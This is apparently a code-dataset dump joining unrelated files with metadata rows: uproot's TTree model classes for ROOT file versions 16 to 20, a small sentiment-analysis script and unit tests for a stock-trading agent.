branches.\x00\x00\x00>\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11ROOT::TIOFeatures@\x00\x00y\xff\xff\xff\xffTStreamerObject\x00@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfBranches\x10List of Branches\x00\x00\x00=\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tTObjArray@\x00\x00\x92\xff\xff\xff\xffTStreamerObject\x00@\x00\x00z\x00\x02@\x00\x00t\x00\x04@\x00\x00@\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fLeaves+Direct pointers to individual branch leaves\x00\x00\x00=\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tTObjArray@\x00\x00\xa7\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00\x88\x00\x02@\x00\x00\x82\x00\x04@\x00\x00Q\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fAliases;List of aliases for expressions based on the tree branches.\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00\x80\xff\xff\xff\xffTStreamerObjectAny\x00@\x00\x00e\x00\x02@\x00\x00_\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfIndexValues\x13Sorted index values\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00}\xff\xff\xff\xffTStreamerObjectAny\x00@\x00\x00b\x00\x02@\x00\x00\\\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fIndex\x16Index of sorted values\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayI@\x00\x00\x98\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00y\x00\x02@\x00\x00s\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfTreeIndex\"Pointer to the tree Index (if any)\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0eTVirtualIndex*@\x00\x00\x8e\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00o\x00\x02@\x00\x00i\x00\x04@\x00\x008\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fFriends\"pointer to list of friend elements\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00\xa6\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00\x87\x00\x02@\x00\x00\x81\x00\x04@\x00\x00P\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfUserInfo9pointer to a list of user objects associated to this Tree\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00\x9b\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00|\x00\x02@\x00\x00v\x00\x04@\x00\x00@\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfBranchRef(Branch supporting the TRefTable (if any)\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0bTBranchRef*\x00",
"TTree",
20,
)
class Model_TTree_v16(uproot.behaviors.TTree.TTree, uproot.model.VersionedModel):
"""
A :doc:`uproot.model.VersionedModel` for ``TTree`` version 16.
"""
behaviors = (uproot.behaviors.TTree.TTree,)
def read_members(self, chunk, cursor, context, file):
if self.is_memberwise:
raise NotImplementedError(
"""memberwise serialization of {0}
in file {1}""".format(
type(self).__name__, self.file.file_path
)
)
self._bases.append(
file.class_named("TNamed", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttLine", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttFill", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttMarker", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
(
self._members["fEntries"],
self._members["fTotBytes"],
self._members["fZipBytes"],
self._members["fSavedBytes"],
self._members["fWeight"],
self._members["fTimerInterval"],
self._members["fScanField"],
self._members["fUpdate"],
self._members["fMaxEntries"],
self._members["fMaxEntryLoop"],
self._members["fMaxVirtualSize"],
self._members["fAutoSave"],
self._members["fEstimate"],
) = cursor.fields(chunk, _ttree16_format1, context)
self._members["fBranches"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fLeaves"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fAliases"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
if file.options["minimal_ttree_metadata"]:
cursor.skip_after(self)
else:
self._members["fIndexValues"] = file.class_named("TArrayD").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fIndex"] = file.class_named("TArrayI").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fTreeIndex"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fFriends"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fUserInfo"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fBranchRef"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
@property
def member_names(self):
minimal = [
"fEntries",
"fTotBytes",
"fZipBytes",
"fSavedBytes",
"fWeight",
"fTimerInterval",
"fScanField",
"fUpdate",
"fMaxEntries",
"fMaxEntryLoop",
"fMaxVirtualSize",
"fAutoSave",
"fEstimate",
"fBranches",
"fLeaves",
"fAliases",
]
extra = [
"fIndexValues",
"fIndex",
"fTreeIndex",
"fFriends",
"fUserInfo",
"fBranchRef",
]
if self._file.options["minimal_ttree_metadata"]:
return minimal
else:
return minimal + extra
base_names_versions = [
("TNamed", 1),
("TAttLine", 1),
("TAttFill", 1),
("TAttMarker", 2),
]
class_flags = {"has_read_object_any": True}
class_code = None
_ttree17_format1 = struct.Struct(">qqqqdiiiiqqqqq")
class Model_TTree_v17(uproot.behaviors.TTree.TTree, uproot.model.VersionedModel):
"""
A :doc:`uproot.model.VersionedModel` for ``TTree`` version 17.
"""
behaviors = (uproot.behaviors.TTree.TTree,)
def read_members(self, chunk, cursor, context, file):
if self.is_memberwise:
raise NotImplementedError(
"""memberwise serialization of {0}
in file {1}""".format(
type(self).__name__, self.file.file_path
)
)
self._bases.append(
file.class_named("TNamed", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttLine", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttFill", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttMarker", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
(
self._members["fEntries"],
self._members["fTotBytes"],
self._members["fZipBytes"],
self._members["fSavedBytes"],
self._members["fWeight"],
self._members["fTimerInterval"],
self._members["fScanField"],
self._members["fUpdate"],
self._members["fDefaultEntryOffsetLen"],
self._members["fMaxEntries"],
self._members["fMaxEntryLoop"],
self._members["fMaxVirtualSize"],
self._members["fAutoSave"],
self._members["fEstimate"],
) = cursor.fields(chunk, _ttree17_format1, context)
self._members["fBranches"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fLeaves"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fAliases"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
if file.options["minimal_ttree_metadata"]:
cursor.skip_after(self)
else:
self._members["fIndexValues"] = file.class_named("TArrayD").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fIndex"] = file.class_named("TArrayI").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fTreeIndex"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fFriends"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fUserInfo"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fBranchRef"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
@property
def member_names(self):
minimal = [
"fEntries",
"fTotBytes",
"fZipBytes",
"fSavedBytes",
"fWeight",
"fTimerInterval",
"fScanField",
"fUpdate",
"fDefaultEntryOffsetLen",
"fMaxEntries",
"fMaxEntryLoop",
"fMaxVirtualSize",
"fAutoSave",
"fEstimate",
"fBranches",
"fLeaves",
"fAliases",
]
extra = [
"fIndexValues",
"fIndex",
"fTreeIndex",
"fFriends",
"fUserInfo",
"fBranchRef",
]
if self._file.options["minimal_ttree_metadata"]:
return minimal
else:
return minimal + extra
base_names_versions = [
("TNamed", 1),
("TAttLine", 1),
("TAttFill", 1),
("TAttMarker", 2),
]
class_flags = {"has_read_object_any": True}
class_code = None
_ttree18_format1 = struct.Struct(">qqqqqdiiiiqqqqqq")
class Model_TTree_v18(uproot.behaviors.TTree.TTree, uproot.model.VersionedModel):
"""
A :doc:`uproot.model.VersionedModel` for ``TTree`` version 18.
"""
behaviors = (uproot.behaviors.TTree.TTree,)
def read_members(self, chunk, cursor, context, file):
if self.is_memberwise:
raise NotImplementedError(
"""memberwise serialization of {0}
in file {1}""".format(
type(self).__name__, self.file.file_path
)
)
self._bases.append(
file.class_named("TNamed", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttLine", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttFill", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttMarker", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
(
self._members["fEntries"],
self._members["fTotBytes"],
self._members["fZipBytes"],
self._members["fSavedBytes"],
self._members["fFlushedBytes"],
self._members["fWeight"],
self._members["fTimerInterval"],
self._members["fScanField"],
self._members["fUpdate"],
self._members["fDefaultEntryOffsetLen"],
self._members["fMaxEntries"],
self._members["fMaxEntryLoop"],
self._members["fMaxVirtualSize"],
self._members["fAutoSave"],
self._members["fAutoFlush"],
self._members["fEstimate"],
) = cursor.fields(chunk, _ttree18_format1, context)
self._members["fBranches"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fLeaves"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fAliases"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
if file.options["minimal_ttree_metadata"]:
cursor.skip_after(self)
else:
self._members["fIndexValues"] = file.class_named("TArrayD").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fIndex"] = file.class_named("TArrayI").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fTreeIndex"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fFriends"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fUserInfo"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fBranchRef"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
@property
def member_values(self):
minimal = [
"fEntries",
"fTotBytes",
"fZipBytes",
"fSavedBytes",
"fFlushedBytes",
"fWeight",
"fTimerInterval",
"fScanField",
"fUpdate",
"fDefaultEntryOffsetLen",
"fMaxEntries",
"fMaxEntryLoop",
"fMaxVirtualSize",
"fAutoSave",
"fAutoFlush",
"fEstimate",
"fBranches",
"fLeaves",
"fAliases",
]
extra = [
"fIndexValues",
"fIndex",
"fTreeIndex",
"fFriends",
"fUserInfo",
"fBranchRef",
]
if self._file.options["minimal_ttree_metadata"]:
return minimal
else:
return minimal + extra
base_names_versions = [
("TNamed", 1),
("TAttLine", 1),
("TAttFill", 1),
("TAttMarker", 2),
]
class_flags = {"has_read_object_any": True}
class_code = None
_ttree19_format1 = struct.Struct(">qqqqqdiiiiIqqqqqq")
_ttree19_dtype1 = numpy.dtype(">i8")
_ttree19_dtype2 = numpy.dtype(">i8")
class Model_TTree_v19(uproot.behaviors.TTree.TTree, uproot.model.VersionedModel):
"""
A :doc:`uproot.model.VersionedModel` for ``TTree`` version 19.
"""
behaviors = (uproot.behaviors.TTree.TTree,)
def read_members(self, chunk, cursor, context, file):
if self.is_memberwise:
raise NotImplementedError(
"""memberwise serialization of {0}
in file {1}""".format(
type(self).__name__, self.file.file_path
)
)
self._bases.append(
file.class_named("TNamed", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttLine", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttFill", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttMarker", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
(
self._members["fEntries"],
self._members["fTotBytes"],
self._members["fZipBytes"],
self._members["fSavedBytes"],
self._members["fFlushedBytes"],
self._members["fWeight"],
self._members["fTimerInterval"],
self._members["fScanField"],
self._members["fUpdate"],
self._members["fDefaultEntryOffsetLen"],
self._members["fNClusterRange"],
self._members["fMaxEntries"],
self._members["fMaxEntryLoop"],
self._members["fMaxVirtualSize"],
self._members["fAutoSave"],
self._members["fAutoFlush"],
self._members["fEstimate"],
) = cursor.fields(chunk, _ttree19_format1, context)
tmp = _ttree19_dtype1
if context.get("speedbump", True):
cursor.skip(1)
self._members["fClusterRangeEnd"] = cursor.array(
chunk, self.member("fNClusterRange"), tmp, context
)
tmp = _ttree19_dtype2
if context.get("speedbump", True):
cursor.skip(1)
self._members["fClusterSize"] = cursor.array(
chunk, self.member("fNClusterRange"), tmp, context
)
self._members["fBranches"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fLeaves"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fAliases"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
if file.options["minimal_ttree_metadata"]:
cursor.skip_after(self)
else:
self._members["fIndexValues"] = file.class_named("TArrayD").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fIndex"] = file.class_named("TArrayI").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fTreeIndex"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fFriends"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fUserInfo"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fBranchRef"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
@property
def member_names(self):
minimal = [
"fEntries",
"fTotBytes",
"fZipBytes",
"fSavedBytes",
"fFlushedBytes",
"fWeight",
"fTimerInterval",
"fScanField",
"fUpdate",
"fDefaultEntryOffsetLen",
"fNClusterRange",
"fMaxEntries",
"fMaxEntryLoop",
"fMaxVirtualSize",
"fAutoSave",
"fAutoFlush",
"fEstimate",
"fClusterRangeEnd",
"fClusterSize",
"fBranches",
"fLeaves",
"fAliases",
]
extra = [
"fIndexValues",
"fIndex",
"fTreeIndex",
"fFriends",
"fUserInfo",
"fBranchRef",
]
if self._file.options["minimal_ttree_metadata"]:
return minimal
else:
return minimal + extra
base_names_versions = [
("TNamed", 1),
("TAttLine", 1),
("TAttFill", 1),
("TAttMarker", 2),
]
class_flags = {"has_read_object_any": True}
class_code = None
_ttree20_format1 = struct.Struct(">qqqqqdiiiiIqqqqqq")
_ttree20_dtype1 = numpy.dtype(">i8")
_ttree20_dtype2 = numpy.dtype(">i8")
class Model_TTree_v20(uproot.behaviors.TTree.TTree, uproot.model.VersionedModel):
"""
A :doc:`uproot.model.VersionedModel` for ``TTree`` version 20.
"""
behaviors = (uproot.behaviors.TTree.TTree,)
def read_members(self, chunk, cursor, context, file):
if self.is_memberwise:
raise NotImplementedError(
"""memberwise serialization of {0}
in file {1}""".format(
type(self).__name__, self.file.file_path
)
)
self._bases.append(
file.class_named("TNamed", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttLine", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttFill", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttMarker", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
(
self._members["fEntries"],
self._members["fTotBytes"],
self._members["fZipBytes"],
self._members["fSavedBytes"],
self._members["fFlushedBytes"],
self._members["fWeight"],
self._members["fTimerInterval"],
self._members["fScanField"],
self._members["fUpdate"],
self._members["fDefaultEntryOffsetLen"],
self._members["fNClusterRange"],
self._members["fMaxEntries"],
self._members["fMaxEntryLoop"],
self._members["fMaxVirtualSize"],
self._members["fAutoSave"],
self._members["fAutoFlush"],
self._members["fEstimate"],
) = cursor.fields(chunk, _ttree20_format1, context)
tmp = _ttree20_dtype1
if context.get("speedbump", True):
cursor.skip(1)
self._members["fClusterRangeEnd"] = cursor.array(
chunk, self.member("fNClusterRange"), tmp, context
)
tmp = _ttree20_dtype2
if context.get("speedbump", True):
cursor.skip(1)
self._members["fClusterSize"] = cursor.array(
chunk, self.member("fNClusterRange"), tmp, context
)
self._members["fIOFeatures"] = file.class_named("ROOT::TIOFeatures").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fBranches"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fLeaves"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fAliases"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
if file.options["minimal_ttree_metadata"]:
cursor.skip_after(self)
else:
self._members["fIndexValues"] = file.class_named("TArrayD").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fIndex"] = file.class_named("TArrayI").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fTreeIndex"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fFriends"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fUserInfo"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fBranchRef"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
@property
def member_names(self):
minimal = [
"fEntries",
"fTotBytes",
"fZipBytes",
"fSavedBytes",
"fFlushedBytes",
"fWeight",
"fTimerInterval",
"fScanField",
"fUpdate",
"fDefaultEntryOffsetLen",
"fNClusterRange",
"fMaxEntries",
"fMaxEntryLoop",
"fMaxVirtualSize",
"fAutoSave",
"fAutoFlush",
"fEstimate",
"fClusterRangeEnd",
"fClusterSize",
"fIOFeatures",
"fBranches",
"fLeaves",
"fAliases",
]
extra = [
"fIndexValues",
"fIndex",
"fTreeIndex",
"fFriends",
"fUserInfo",
"fBranchRef",
]
if self._file.options["minimal_ttree_metadata"]:
return minimal
else:
return minimal + extra
base_names_versions = [
("TNamed", 1),
("TAttLine", 2),
("TAttFill", 2),
("TAttMarker", 2),
]
class_flags = {"has_read_object_any": True}
class_code = None
class_rawstreamers = (
_rawstreamer_TRefTable_v3,
uproot.models.TBranch._rawstreamer_TBranch_v13,
_rawstreamer_TBranchRef_v1,
uproot.models.TH._rawstreamer_TList_v5,
uproot.models.TH._rawstreamer_TCollection_v3,
uproot.models.TH._rawstreamer_TSeqCollection_v0,
uproot.models.TObjArray._rawstreamer_TObjArray_v3,
uproot.models.TBranch._rawstreamer_ROOT_3a3a_TIOFeatures_v1,
uproot.models.TH._rawstreamer_TAttMarker_v2,
uproot.models.TH._rawstreamer_TAttFill_v2,
uproot.models.TH._rawstreamer_TAttLine_v2,
uproot.models.TH._rawstreamer_TString_v2,
uproot.models.TH._rawstreamer_TObject_v1,
uproot.models.TH._rawstreamer_TNamed_v1,
_rawstreamer_TTree_v20,
)
class Model_TTree(uproot.model.DispatchByVersion):
"""
A :doc:`uproot.model.DispatchByVersion` for ``TTree``.
"""
known_versions = {
16: Model_TTree_v16,
17: Model_TTree_v17,
18: Model_TTree_v18,
19: Model_TTree_v19,
20: Model_TTree_v20,
}
_tiofeatures_format1 = struct.Struct(">B")
class Model_ROOT_3a3a_TIOFeatures(uproot.model.Model):
"""
A versionless :doc:`uproot.model.Model` for ``ROOT::TIOFeatures``.
"""
def read_members(self, chunk, cursor, context, file):
if self.is_memberwise:
raise NotImplementedError(
"""memberwise serialization of {0}
in file {1}""".format(
type(self).__name__, self.file.file_path
)
)
cursor.skip(4)
self._members["fIOBits"] = cursor.field(chunk, _tiofeatures_format1, context)
uproot.classes["TTree"] = Model_TTree
uproot.classes["ROOT::TIOFeatures"] = Model_ROOT_3a3a_TIOFeatures
| 48.946095
| 12,249
| 0.607233
| 5,675
| 44,492
| 4.657445
| 0.082643
| 0.385456
| 0.467519
| 0.513034
| 0.838599
| 0.82721
| 0.794446
| 0.77114
| 0.767962
| 0.765313
| 0
| 0.16899
| 0.245482
| 44,492
| 908
| 12,250
| 49
| 0.61835
| 0.014744
| 0
| 0.750306
| 0
| 0.007344
| 0.358654
| 0.263672
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013464
| false
| 0
| 0.007344
| 0
| 0.068543
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
1cb1387d7acf5ec64b382ee61a57173415e57248
| 290
|
py
|
Python
|
ref_2.py
|
TejasReddy9/tsa_finalyr
|
7eee8bb7d489d83c75ffd527a53f556d0665a140
|
[
"MIT"
] | null | null | null |
ref_2.py
|
TejasReddy9/tsa_finalyr
|
7eee8bb7d489d83c75ffd527a53f556d0665a140
|
[
"MIT"
] | null | null | null |
ref_2.py
|
TejasReddy9/tsa_finalyr
|
7eee8bb7d489d83c75ffd527a53f556d0665a140
|
[
"MIT"
] | 1
|
2018-06-30T08:17:43.000Z
|
2018-06-30T08:17:43.000Z
|
import sentiment_mod as s
print(s.sentiment("This movie was awesome! The acting was great, plot was wonderful, and there were pythons..so yea!"))
print(s.sentiment("This movie was utter junk. There were absolutely 0 pythons. I don't see what the point was at all. Horrible movie, 0/10"))
| 58
| 141
| 0.758621
| 52
| 290
| 4.211538
| 0.673077
| 0.054795
| 0.136986
| 0.173516
| 0.246575
| 0.246575
| 0
| 0
| 0
| 0
| 0
| 0.01626
| 0.151724
| 290
| 4
| 142
| 72.5
| 0.873984
| 0
| 0
| 0
| 0
| 0.666667
| 0.744828
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
1cc150b5bd37fc63c63015df794ed2a741d87046
| 2,514
|
py
|
Python
|
4-deep-q-learning/traders/test/tt_trader_test.py
|
dh-ab93/OSS-SAKI
|
c869d2346286de83222a0664694de15c6d26d301
|
[
"Apache-2.0"
] | null | null | null |
4-deep-q-learning/traders/test/tt_trader_test.py
|
dh-ab93/OSS-SAKI
|
c869d2346286de83222a0664694de15c6d26d301
|
[
"Apache-2.0"
] | null | null | null |
4-deep-q-learning/traders/test/tt_trader_test.py
|
dh-ab93/OSS-SAKI
|
c869d2346286de83222a0664694de15c6d26d301
|
[
"Apache-2.0"
] | 1
|
2020-02-24T20:51:18.000Z
|
2020-02-24T20:51:18.000Z
|
from unittest import TestCase
from experts.perfect_expert import PerfectExpert
from framework.order import OrderType
from framework.portfolio import Portfolio
from framework.company import Company
from framework.period import Period
from framework.stock_market_data import StockMarketData
from traders.trusting_trader import TrustingTrader
class TestTrustingTrader(TestCase):
def test_create_tt_trader(self):
expert_a = PerfectExpert(Company.A)
expert_b = PerfectExpert(Company.B)
trader = TrustingTrader(expert_a, expert_b, 'test_color', 'test_name')
self.assertIsNotNone(trader)
self.assertEqual(trader.get_color(), 'test_color')
self.assertEqual(trader.get_name(), 'test_name')
def test_trade_vote_up_stock_a(self):
expert_a = PerfectExpert(Company.A)
expert_b = PerfectExpert(Company.B)
trader = TrustingTrader(expert_a, expert_b, 'test_color', 'test_name')
portfolio = Portfolio(1000.0, {Company.A: 10, Company.B: 10})
stock_market_data = StockMarketData([Company.A, Company.B], [Period.TESTING]).deepcopy_first_n_items(1)
order_list = trader.trade(portfolio, stock_market_data)
self.assertIsNotNone(order_list)
self.assertEqual(len(order_list), 2)
self.assertEqual(order_list[0].type, OrderType.BUY)
self.assertEqual(order_list[0].company, Company.A)
self.assertEqual(order_list[0].amount, 28.0)
self.assertEqual(order_list[1].type, OrderType.SELL)
self.assertEqual(order_list[1].company, Company.B)
self.assertEqual(order_list[1].amount, 10.0)
def test_trade_vote_down_stock_a(self):
expert_a = PerfectExpert(Company.A)
expert_b = PerfectExpert(Company.B)
trader = TrustingTrader(expert_a, expert_b, 'test_color', 'test_name')
portfolio = Portfolio(1000.0, {Company.A: 10, Company.B: 10})
stock_market_data = StockMarketData([Company.A, Company.B], [Period.TESTING]).deepcopy_first_n_items(4)
order_list = trader.trade(portfolio, stock_market_data)
self.assertIsNotNone(order_list)
self.assertEqual(len(order_list), 2)
self.assertEqual(order_list[0].type, OrderType.SELL)
self.assertEqual(order_list[0].company, Company.A)
self.assertEqual(order_list[0].amount, 10.0)
self.assertEqual(order_list[1].type, OrderType.SELL)
self.assertEqual(order_list[1].company, Company.B)
self.assertEqual(order_list[1].amount, 10.0)
| 47.433962
| 111
| 0.71957
| 327
| 2,514
| 5.314985
| 0.17737
| 0.093211
| 0.13809
| 0.165708
| 0.71519
| 0.71519
| 0.71519
| 0.712888
| 0.712888
| 0.712888
| 0
| 0.022105
| 0.172235
| 2,514
| 52
| 112
| 48.346154
| 0.813071
| 0
| 0
| 0.543478
| 0
| 0
| 0.030231
| 0
| 0
| 0
| 0
| 0
| 0.413043
| 1
| 0.065217
| false
| 0
| 0.173913
| 0
| 0.26087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cd22f6e81e040b50bfb33b66d2a3f0eef5cfaa9
| 4,088
|
py
|
Python
|
resources_rc.py
|
anyways-open/qgis-plugins
|
07eedb01e2081207a940ff87bba2b6d67f916a7b
|
[
"MIT"
] | 1
|
2021-02-11T08:34:15.000Z
|
2021-02-11T08:34:15.000Z
|
resources_rc.py
|
anyways-open/impact-qgis-plugin
|
07eedb01e2081207a940ff87bba2b6d67f916a7b
|
[
"MIT"
] | 20
|
2021-01-08T11:13:45.000Z
|
2022-03-05T09:13:37.000Z
|
resources_rc.py
|
anyways-open/qgis-plugins
|
